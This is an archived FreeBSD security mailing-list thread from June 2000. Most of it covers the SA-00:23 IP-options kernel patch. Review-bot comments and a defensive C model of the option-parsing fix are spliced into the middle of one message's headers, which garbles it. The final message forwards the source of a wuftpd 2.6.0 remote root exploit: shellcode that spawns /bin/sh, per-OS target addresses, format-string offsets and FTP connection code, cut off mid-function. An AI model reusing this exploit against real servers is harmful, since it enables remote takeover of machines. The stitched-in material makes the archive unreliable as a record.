On Wed, Jun 21, 2000 at 05:15:46PM -0700, Don Lewis wrote:
[ Quote from Brett SNIPPED ]
> Turning on the RST restriction makes it much easier to spoof TCP connections
> that appear to come from your machine or to hijack established TCP
> connections...

Keep in mind that rate limiting RSTs will only give you a marginally better defence for this type of attack over no RSTs at all. All it would take to gag you is an ACK flood.

BMG

From owner-freebsd-security Thu Jun 22 15:38:07 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5662537B800; Thu, 22 Jun 2000 15:38:02 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA84550; Thu, 22 Jun 2000 15:38:02 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 22 Jun 2000 15:38:01 -0700 (PDT)
From: Kris Kennaway
To: George Hartz
Cc: Tim McCullagh , Christiaan Rademan , freebsd-security@FreeBSD.ORG
Subject: Re: Hi All.
In-Reply-To: <001301bfdc35$3dbff170$0301a8c0@pentium>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 22 Jun 2000, George Hartz wrote:

> One of the systems I use as a firewall is running 4.0 as well, and is doing
> the same thing. It was on some hardware that I'd had some reliability
> problems with in the past (bad DIMM), but two days ago I replaced the DIMM,
> and was rather unhappy to discover yesterday that it's still doing it.

This is quite probably related to advisory 00:23, which I just released. Sorry for the delay on this one, it was intended to go out on Monday.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Thu Jun 22 17:02:12 2000
Delivered-To: freebsd-security@freebsd.org
Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id C91DC37BAC7 for ; Thu, 22 Jun 2000 17:01:59 -0700 (PDT) (envelope-from todd@flyingcroc.net)
Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id RAA84851 for ; Thu, 22 Jun 2000 17:01:06 -0700 (PDT) (envelope-from todd@flyingcroc.net)
X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs
Date: Thu, 22 Jun 2000 17:01:06 -0700 (PDT)
From: Todd Backman
X-Sender: todd@security1.noc.flyingcroc.net
To: security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options
In-Reply-To: <20000622215052.D642E37BF12@hub.freebsd.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

So, upon following the instructions for patch on the SA (including DL'ing the patch from the ftp site) I get the following:

**** START ****

stuff# patch -p < ip-options.diff
Hmm... Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|Index: ip_icmp.c
|===================================================================
|RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v
|retrieving revision 1.39
|diff -u -r1.39 ip_icmp.c
|--- ip_icmp.c 2000/01/28 06:13:09 1.39
|+++ ip_icmp.c 2000/06/08 15:26:39
--------------------------
Patching file ip_icmp.c using Plan A...
Hunk #1 failed at 662.
1 out of 1 hunks failed--saving rejects to ip_icmp.c.rej
Hmm... The next patch looks like a unified diff to me...
The text leading up to this was:
--------------------------
|Index: ip_input.c
|===================================================================
|RCS file: /ncvs/src/sys/netinet/ip_input.c,v
|retrieving revision 1.130
|diff -u -r1.130 ip_input.c
|--- ip_input.c 2000/02/23 20:11:57 1.130
|+++ ip_input.c 2000/06/08 15:25:46
--------------------------
Patching file ip_input.c using Plan A...
Hunk #1 failed at 1067.
Hunk #2 failed at 1178.
2 out of 2 hunks failed--saving rejects to ip_input.c.rej
Hmm... The next patch looks like a unified diff to me...
The text leading up to this was: -------------------------- |Index: ip_output.c |=================================================================== |RCS file: /ncvs/src/sys/netinet/ip_output.c,v |retrieving revision 1.99 |diff -u -r1.99 ip_output.c |--- ip_output.c 2000/03/09 14:57:15 1.99 |+++ ip_output.c 2000/06/08 15:27:08 -------------------------- Patching file ip_output.c using Plan A... Hunk #1 failed at 1302. 1 out of 1 hunks failed--saving rejects to ip_output.c.rej done **** FINISH **** Can anyone hit me with the cluestick? Thanks. - Todd On Thu, 22 Jun 2000, FreeBSD Security Advisories wrote: > # cd /usr/src/sys/netinet > # patch -p < /path/to/patch_or_advisory > > Index: ip_icmp.c > =================================================================== > RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > retrieving revision 1.39 > diff -u -r1.39 ip_icmp.c > --- ip_icmp.c 2000/01/28 06:13:09 1.39 > +++ ip_icmp.c 2000/06/08 15:26:39 > @@ -662,8 +662,11 @@ > if (opt == IPOPT_NOP) > len = 1; > else { > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > + break; > len = cp[IPOPT_OLEN]; > - if (len <= 0 || len > cnt) > + if (len < IPOPT_OLEN + sizeof(*cp) || > + len > cnt) > break; > } > /* > Index: ip_input.c > =================================================================== > RCS file: /ncvs/src/sys/netinet/ip_input.c,v > retrieving revision 1.130 > diff -u -r1.130 ip_input.c > --- ip_input.c 2000/02/23 20:11:57 1.130 > +++ ip_input.c 2000/06/08 15:25:46 > @@ -1067,8 +1067,12 @@ > if (opt == IPOPT_NOP) > optlen = 1; > else { > + if (cnt < IPOPT_OLEN + sizeof(*cp)) { > + code = &cp[IPOPT_OLEN] - (u_char *)ip; > + goto bad; > + } > optlen = cp[IPOPT_OLEN]; > - if (optlen <= 0 || optlen > cnt) { > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) { > code = &cp[IPOPT_OLEN] - (u_char *)ip; > goto bad; > } 
> @@ -1174,6 +1178,10 @@ > break; > > case IPOPT_RR: > + if (optlen < IPOPT_OFFSET + sizeof(*cp)) { > + code = &cp[IPOPT_OFFSET] - (u_char *)ip; > + goto bad; > + } > if ((off = cp[IPOPT_OFFSET]) < IPOPT_MINOFF) { > code = &cp[IPOPT_OFFSET] - (u_char *)ip; > goto bad; > Index: ip_output.c > =================================================================== > RCS file: /ncvs/src/sys/netinet/ip_output.c,v > retrieving revision 1.99 > diff -u -r1.99 ip_output.c > --- ip_output.c 2000/03/09 14:57:15 1.99 > +++ ip_output.c 2000/06/08 15:27:08 > @@ -1302,8 +1302,10 @@ > if (opt == IPOPT_NOP) > optlen = 1; > else { > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > + goto bad; > optlen = cp[IPOPT_OLEN]; > - if (optlen <= IPOPT_OLEN || optlen > cnt) > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) > goto bad; > } > switch (opt) { > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 17:16:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id 1879337B67D for ; Thu, 22 Jun 2000 17:16:40 -0700 (PDT) (envelope-from todd@flyingcroc.net) Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id RAA84965; Thu, 22 Jun 2000 17:16:06 -0700 (PDT) (envelope-from todd@flyingcroc.net) X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs Date: Thu, 22 Jun 2000 17:16:06 -0700 (PDT) 
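Review bot: in the second ip_input.c hunk the `optlen < IPOPT_OFFSET + sizeof(*cp)` guard is added only under `case IPOPT_RR:`; any other case in this switch that indexes `cp[IPOPT_OFFSET]` or beyond before checking `optlen` needs the same treatment, and the hunk's context does not show whether the other option types are covered, so that should be confirmed before this is committed. Since the earlier hunk already guarantees `optlen >= 2`, this test only has to exclude a record-route option of length 2; a short comment that the RR pointer byte is the third byte of the option would make the bound obvious.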
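Review bot: in the ip_output.c hunk the only behavioural change is the new `cnt` guard before `cp[IPOPT_OLEN]` is read; the old `optlen <= IPOPT_OLEN` already rejected lengths 0 and 1, so `optlen < IPOPT_OLEN + sizeof(*cp)` is the same bound, just spelled the way ip_input.c now spells it. Worth saying so in the commit message, and the signed/unsigned remark on the ip_icmp.c hunk applies here too. This path does `goto bad` without a parameter-problem `code`, which is fine for locally supplied options, but the same option walk now exists in three files with three slightly different length tests; a shared length-check helper would avoid a third copy of the next fix.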
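As an added example, not code from the advisory, from FreeBSD or from anyone in this thread: the walk below is a stand-alone model of the option loop that the ip_input.c hunks of the SA-00:23 diff quoted above patch, run over constructed option bytes. Every byte goes through an accessor that records an index past the end of option space instead of dereferencing it, so the pre-patch tests can be exercised without reading past a buffer. walk_options(), the result codes and the sample byte strings are this example's own names; the IPOPT_* values are redefined locally with the values from <netinet/ip.h>, and sizeof(*cp) from the diff is written as 1. Only the record-route case the diff touches is modelled.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Values as in <netinet/ip.h>, redefined so the example is self-contained. */
#define IPOPT_EOL      0
#define IPOPT_NOP      1
#define IPOPT_RR       7
#define IPOPT_OLEN     1   /* offset of the option length byte */
#define IPOPT_OFFSET   2   /* offset of the RR pointer byte */
#define IPOPT_MINOFF   4   /* smallest legal pointer value */

enum walk_result { WALK_OK = 0, WALK_BAD = 1, WALK_OOB = 2 };

/* Option space plus a flag recording any index past its end. */
struct optspace {
    const uint8_t *base;
    int cnt;
    int oob;
};

/* Checked read: flags an out-of-range index instead of dereferencing it. */
static int rd(struct optspace *o, const uint8_t *cp, int idx)
{
    ptrdiff_t pos = (cp - o->base) + idx;
    if (pos < 0 || pos >= o->cnt) {
        o->oob = 1;
        return 0;   /* stand-in for whatever follows the options in memory */
    }
    return cp[idx];
}

/* Walk option space the way ip_input.c does.  patched == 0 applies the
 * pre-SA-00:23 tests, patched != 0 the tests the diff adds.  Returns
 * WALK_OOB as soon as a byte outside option space was consulted. */
static enum walk_result walk_options(const uint8_t *opts, int cnt, int patched)
{
    struct optspace o = { opts, cnt, 0 };
    const uint8_t *cp = opts;
    int opt, optlen, off;

    for (; cnt > 0; cp += optlen, cnt -= optlen) {
        opt = rd(&o, cp, 0);
        if (opt == IPOPT_EOL)
            break;
        if (opt == IPOPT_NOP) {
            optlen = 1;
        } else {
            if (patched && cnt < IPOPT_OLEN + 1)
                return WALK_BAD;        /* type byte with no room for a length byte */
            optlen = rd(&o, cp, IPOPT_OLEN);
            if (o.oob)
                return WALK_OOB;        /* old code read the length from past the end */
            if (patched ? (optlen < IPOPT_OLEN + 1 || optlen > cnt)
                        : (optlen <= 0 || optlen > cnt))
                return WALK_BAD;
        }
        if (opt == IPOPT_RR) {
            if (patched && optlen < IPOPT_OFFSET + 1)
                return WALK_BAD;        /* option too short to hold a pointer byte */
            off = rd(&o, cp, IPOPT_OFFSET);
            if (o.oob)
                return WALK_OOB;        /* old code read the pointer from past the end */
            if (off < IPOPT_MINOFF)
                return WALK_BAD;
        }
    }
    return WALK_OK;
}

/* Constructed option bytes, not taken from any captured packet. */
static const uint8_t rr_valid[]  = { IPOPT_NOP, IPOPT_RR, 7, 4, 0, 0, 0, 0 };     /* cnt 8 */
static const uint8_t rr_no_ptr[] = { IPOPT_NOP, IPOPT_NOP, IPOPT_RR, 2 };         /* cnt 4 */
static const uint8_t type_only[] = { IPOPT_NOP, IPOPT_NOP, IPOPT_NOP, IPOPT_RR }; /* cnt 4 */

int main(void)
{
    static const char *names[] = { "ok", "rejected", "read past option space" };
    printf("rr_valid : old=%s new=%s\n",
           names[walk_options(rr_valid, 8, 0)], names[walk_options(rr_valid, 8, 1)]);
    printf("rr_no_ptr: old=%s new=%s\n",
           names[walk_options(rr_no_ptr, 4, 0)], names[walk_options(rr_no_ptr, 4, 1)]);
    printf("type_only: old=%s new=%s\n",
           names[walk_options(type_only, 4, 0)], names[walk_options(type_only, 4, 1)]);
    return 0;
}
```

The two malformed inputs are the ones the diff is about: a record-route option of length 2 that is the last option (the old code fetched its pointer byte from beyond option space) and a bare type byte at the end of option space (the old code fetched a length byte that is not there). With the patched tests both are rejected before any read happens, while a well-formed option is unaffected.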
From: Todd Backman X-Sender: todd@security1.noc.flyingcroc.net To: Todd Backman Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org After copying the patch from the SA, hacking out the cruft and running, it seems to work. The /pub/FreeBSD/CERT/patches/SA-00:23 does not work. Could it be due to the format of the patch on the ftp site? (just trying to figure things out here so I do not have a clue at a later date...) Thanks. - Todd On Thu, 22 Jun 2000, Todd Backman wrote: > > So, upon following the instructions for patch on the SA (including DL'ing > the patch from the ftp site) I get the following: > > **** START **** > > stuff# patch -p < ip-options.diff > Hmm... Looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_icmp.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > |retrieving revision 1.39 > |diff -u -r1.39 ip_icmp.c > |--- ip_icmp.c 2000/01/28 06:13:09 1.39 > |+++ ip_icmp.c 2000/06/08 15:26:39 > -------------------------- > Patching file ip_icmp.c using Plan A... > Hunk #1 failed at 662. > 1 out of 1 hunks failed--saving rejects to ip_icmp.c.rej > Hmm... The next patch looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_input.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_input.c,v > |retrieving revision 1.130 > |diff -u -r1.130 ip_input.c > |--- ip_input.c 2000/02/23 20:11:57 1.130 > |+++ ip_input.c 2000/06/08 15:25:46 > -------------------------- > Patching file ip_input.c using Plan A... > Hunk #1 failed at 1067. > Hunk #2 failed at 1178. 
> 2 out of 2 hunks failed--saving rejects to ip_input.c.rej > Hmm... The next patch looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_output.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_output.c,v > |retrieving revision 1.99 > |diff -u -r1.99 ip_output.c > |--- ip_output.c 2000/03/09 14:57:15 1.99 > |+++ ip_output.c 2000/06/08 15:27:08 > -------------------------- > Patching file ip_output.c using Plan A... > Hunk #1 failed at 1302. > 1 out of 1 hunks failed--saving rejects to ip_output.c.rej > done > > **** FINISH **** > > Can anyone hit me with the cluestick? > > Thanks. > > - Todd > > > On Thu, 22 Jun 2000, FreeBSD Security Advisories wrote: > > > # cd /usr/src/sys/netinet > > # patch -p < /path/to/patch_or_advisory > > > > Index: ip_icmp.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > > retrieving revision 1.39 > > diff -u -r1.39 ip_icmp.c > > --- ip_icmp.c 2000/01/28 06:13:09 1.39 > > +++ ip_icmp.c 2000/06/08 15:26:39 > > @@ -662,8 +662,11 @@ > > if (opt == IPOPT_NOP) > > len = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + break; > > len = cp[IPOPT_OLEN]; > > - if (len <= 0 || len > cnt) > > + if (len < IPOPT_OLEN + sizeof(*cp) || > > + len > cnt) > > break; > > } > > /* > > Index: ip_input.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_input.c,v > > retrieving revision 1.130 > > diff -u -r1.130 ip_input.c > > --- ip_input.c 2000/02/23 20:11:57 1.130 > > +++ ip_input.c 2000/06/08 15:25:46 
> > @@ -1067,8 +1067,12 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) { > > + code = &cp[IPOPT_OLEN] - (u_char *)ip; > > + goto bad; > > + } > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= 0 || optlen > cnt) { > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) { > > code = &cp[IPOPT_OLEN] - (u_char *)ip; > > goto bad; > > } > > @@ -1174,6 +1178,10 @@ > > break; > > > > case IPOPT_RR: > > + if (optlen < IPOPT_OFFSET + sizeof(*cp)) { > > + code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > + goto bad; > > + } > > if ((off = cp[IPOPT_OFFSET]) < IPOPT_MINOFF) { > > code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > goto bad; > > Index: ip_output.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_output.c,v > > retrieving revision 1.99 > > diff -u -r1.99 ip_output.c > > --- ip_output.c 2000/03/09 14:57:15 1.99 > > +++ ip_output.c 2000/06/08 15:27:08 
> > @@ -1302,8 +1302,10 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + goto bad; > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= IPOPT_OLEN || optlen > cnt) > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) > > goto bad; > > } > > switch (opt) { > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 17:24:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from wat-border.sentex.ca (waterloo-hespler.sentex.ca [199.212.135.66]) by hub.freebsd.org (Postfix) with ESMTP id F368537BB2F; Thu, 22 Jun 2000 17:24:09 -0700 (PDT) (envelope-from mike@sentex.net) Received: from granite.sentex.net (granite-atm.sentex.ca [209.112.4.1]) by wat-border.sentex.ca (8.9.3/8.9.3) with ESMTP id UAA05667; Thu, 22 Jun 2000 20:24:09 -0400 (EDT) (envelope-from mike@sentex.net) Received: from chimp (cage.simianscience.com [64.7.134.1]) by granite.sentex.net (8.8.8/8.6.9) with ESMTP id UAA28373; Thu, 22 Jun 2000 20:24:06 -0400 (EDT) Message-Id: <4.2.2.20000622201823.0479a690@mail.sentex.net> X-Sender: mdtancsa@mail.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Thu, 22 Jun 2000 20:19:51 -0400 To: freebsd-security@FreeBSD.org From: Mike Tancsa Subject: Fwd: WuFTPD: Providing *remote* root since at least1994 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For those of you who missed it on Bugtraq :-( ---Mike >Approved-By: aleph1@SECURITYFOCUS.COM >Delivered-To: bugtraq@lists.securityfocus.com >Delivered-To: bugtraq@securityfocus.com >Date: Fri, 23 Jun 2000 00:06:18 +0400 >Reply-To: tf8 >Sender: Bugtraq List 
>From: tf8
>Subject: WuFTPD: Providing *remote* root since at least1994
>To: BUGTRAQ@SECURITYFOCUS.COM
>
>/* - wuftpd2600.c
> * VERY PRIVATE VERSION. DO NOT DISTRIBUTE. 15-10-1999
> *
> * WUFTPD 2.6.0 REMOTE ROOT EXPLOIT
> * by tf8
> *
> * *NOTE*: For ethical reasons, only an exploit for 2.6.0 will be
> * released (2.6.0 is the most popular version nowadays), and it
> * should suffice to proof this vulnerability concept.
> *
> * Site exec was never really *fixed*
> *
> * Greetz to portal (he is elite!#%$) and all #!security.is, glitch, DiGit,
> * \x90, venglin, xz, MYT and lamagra.
> * Also greetings go to the WU-FTPD development team for including this
> * bug in ALL their versions.
> *
> * Fuck to wuuru (he is an idiot)
> *
> * Account is not required, anonymous access is enough :)
> *
> * BTW, exploit is broken to avoid kids usage ;)
> *
> * VERY PRIVATE VERSION. DO NOT DISTRIBUTE. 15-10-1999
> */
>/* Header names restored: the list archive dropped everything between
> * '<' and '>'.  These are the headers the calls below need. */
>#include <stdio.h>
>#include <stdlib.h>
>#include <string.h>
>#include <strings.h>   /* bzero() */
>#include <unistd.h>
>#include <errno.h>
>#include <signal.h>
>#include <netdb.h>
>#include <sys/types.h>
>#include <sys/time.h>
>#include <sys/socket.h>
>#include <netinet/in.h>
>#include <arpa/inet.h>
>
>#ifdef __linux
>#include <getopt.h>
>#endif
>
>/* Little-endian byte split of an address, for embedding it in the format line. */
>#define MAKE_STR_FROM_RET(x) \
>((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)
>#define GREEN "\033[32m"
>#define RED "\033[31m"
>#define NORM "\033[0m"
>
>char infin_loop[]= /* for testing purposes */
> "\xEB\xFE";
>
>char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
> "\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
> "\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
> "\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
> "\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
> "\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
> "\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
> "\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
> "\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
> "\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
> "\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
> "\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x30"
> "\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
> "\x67\x6c\x69\x6e";
>
>char bsd_code_d[]= /* you should call it directly (no jump/call)*/
> "\xEB\xFE\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5C"
> "\x8B\x74\x24\xFC\x31\xC9\xB1\x15\x01\xCE\xB1\x71\xB0\xEF"
> "\x30\x06\x8D\x76\x01\xE2\xF9\xDE\x26\xDE\x2F\xBE\x5F\xF8"
> "\xBF\x22\x6F\x5F\xB5\xEB\xB4\xBE\xBF\x22\x6F\x62\xB9\x14"
> "\x87\x75\xED\xEF\xEF\xBD\x5F\x67\xBF\x22\x6F\x62\xB9\x11"
> "\xBE\xBD\x5F\xEA\xBF\x22\x6F\x66\x2C\x62\xB9\x14\xBD\x5F"
> "\xD2\xBF\x22\x6F\xBC\x5F\xE2\xBF\x22\x6F\x5C\x11\x62\xB9"
> "\x12\x5F\xE3\xBD\xBF\x22\x6F\x11\x24\x9A\x1C\x62\xB9\x11"
> "\xBD\x5F\xD2\xBF\x22\x6F\x62\x99\x12\x66\xA1\xEB\x62\xB9"
> "\x17\x66\xF9\xB9\xB9\xBD\x5F\xD4\xBF\x22\x6F\xC0\x8D\x86"
> "\x81\xC0\x9C\x87\xEF\xC1\xC1\xEF";
>
>char linuxcode[]= /* Lam3rZ chroot() code */
> "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
> "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
> "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
> "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
> "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
> "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
> "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
> "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
> "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
> "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";
>
>#define MAX_FAILED 4
>#define MAX_MAGIC 100
>/* magic[] / magic_d[] describe the format-string prefix that walks the stack
> * up to the saved return address: magic_d 1 = "%.f", 2 = "%c", 3 = "%d",
> * 4 = padding bytes; magic[] is the repeat count for each. */
>static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
>static char *magic_str=NULL;
>int before_len=0;
>char *target=NULL,*username="ftp",*password=NULL;
>struct targets getit;
>
>struct targets {
> int def;
> char *os_descr, *shellcode;
> int delay;
> u_long pass_addr, addr_ret_addr;
> int magic[MAX_MAGIC],
>  magic_d[MAX_MAGIC],islinux;
>};
>
>struct targets targ[]={
> {0,"RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm",linuxcode,2,0x8075b00-700,0xbfffb028,{0x87,3,1,2},{1,2,1,4},1},
> {0,"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm",linuxcode,2,0x8075b00-700,0xbfffb038,{0x87,3,1,2},{1,2,1,4},1},
> {0,"SuSe 6.3 with wuftpd 2.6.0(1) from rpm",linuxcode,2,0x8076cb0-400,0xbfffb018,{0x87,3,1,2},{1,2,1,4},1},
> {0,"SuSe 6.4 with wuftpd 2.6.0(1) from rpm",linuxcode,2,0x8076920-400,0xbfffafec,{0x88,3,1,2},{1,2,1,4},1},
> {0,"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm (test)",linuxcode,2,0x8075b00-700,0xbfffb070,{0x87,3,1,2},{1,2,1,4},1},
>
> {0,"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from ports",bsdcode,10,0x80bb474-100,0xbfbfc164,{0x3b,2,4,1,0x44,2,1,2},{1,2,1,2,1,2,1,4},0},
> {1,"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from packages",bsdcode,2,0x806d5b0-500,0xbfbfc6bc,{0x84,1,2,1,2},{1,3,2,1,4},0},
> {0,"FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from ports",bsdcode,2,0x80a4dec-400,0xbfbfc624,{0x3B,2,1,0xe,0x40,1,2,1,2},{1,2,1,2,1,3,2,1,4},0},
> {0,"FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from packages",infin_loop,2,0x80706f0,0xbfbfe798,{0x88,2,1,2},{1,2,1,4},0},
> {0,NULL,NULL,0,0,0,{0},{0},0}
>};
>
>void usage(char*zu,int q){
>int i, n, padding;
>fprintf(stderr,"Usage: %s -t <target> [-l user/pass] [-s systype] [-o offset] [-g] [-h] [-x]\n"
>" [-m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M dir]\n"
>"target : host with any wuftpd\nuser : anonymous user\n"
>"dir : if not anonymous user, you need to have writable directory\n"
>"magic_str : magic string (see exploit description)\n-g : enables magic string digging\n"
>"-x : enables test mode\npass_addr : pointer to setproctitle argument\n"
>"ret_addr : this is pointer to shellcode\nsystypes: \n",zu);
> for(i=0;targ[i].os_descr!=NULL;i++){
>  padding=0;
>  fprintf(stderr,"%s%2d - %s\n",targ[i].def?"*":" ",i,targ[i].os_descr);
>  if(q>1){
>   fprintf(stderr," Magic ID: [");
>   for(n=0;targ[i].magic[n]!=0;n++){
>    if(targ[i].magic_d[n]==4)
>     padding=targ[i].magic[n];
>    fprintf(stderr,"%02X,%02X",targ[i].magic[n],targ[i].magic_d[n]);
>    if(targ[i].magic[n+1]!=0)
>     fprintf(stderr,":");
>   }
>   fprintf(stderr,"] Padding: %d\n",padding);
>   fflush(stderr);
>  }
> }
> exit(1);
>}
>
>int connect_to_server(char*host){
> struct hostent *hp;
> struct sockaddr_in cl;
> int sock;
>
> if(host==NULL||*host==(char)0){
>  fprintf(stderr,"Invalid hostname\n");
>  exit(1);
> }
> if((cl.sin_addr.s_addr=inet_addr(host))==-1) {
>  if((hp=gethostbyname(host))==NULL) {
>   fprintf(stderr,"Cannot resolve %s\n",host);
>   exit(1);
>  }
>  memcpy((char*)&cl.sin_addr,(char*)hp->h_addr,sizeof(cl.sin_addr));
> }
> if((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))==-1){
>  fprintf(stderr,"Error creating socket: %s\n",strerror(errno));
>  exit(1);
> }
> cl.sin_family=PF_INET;
> cl.sin_port=htons(21);
> if(connect(sock,(struct sockaddr*)&cl,sizeof(cl))==-1){
>  fprintf(stderr,"Cannot connect to %s: %s\n",host,strerror(errno));
>  exit(1);
> }
> return sock;
>}
>
>/* disc != 0: discard up to and including the next newline;
> * otherwise read one chunk into buf and NUL-terminate it. */
>int ftp_recv(int sock,char*buf,int buf_size,int disc){
> int n=0;
> char q;
>
> if(disc) while((n=recv(sock,&q,1,0))==1&&q!='\n');
> else {
>  (void)bzero(buf,buf_size);
>  n=recv(sock,buf,buf_size-1,0);   /* leave room for the terminator */
>  if(n<0){
>   fprintf(stderr,"ftp_recv: recv failed\n");
>   exit(1);
>  }
>  buf[n]=0;
> }
> return n;
>}
>int ftp_send(int sock,char*what,int size,int f,char*ans,int ans_size){
> int n;
> n=send(sock,what,size,0);
> if(n!=size){
>  fprintf(stderr,"ftp_send: failed to send. expected %d, sent %d\n", size,n);
>  shutdown(sock,2);
>  close(sock);
>  exit(1);
> }
> if(f)
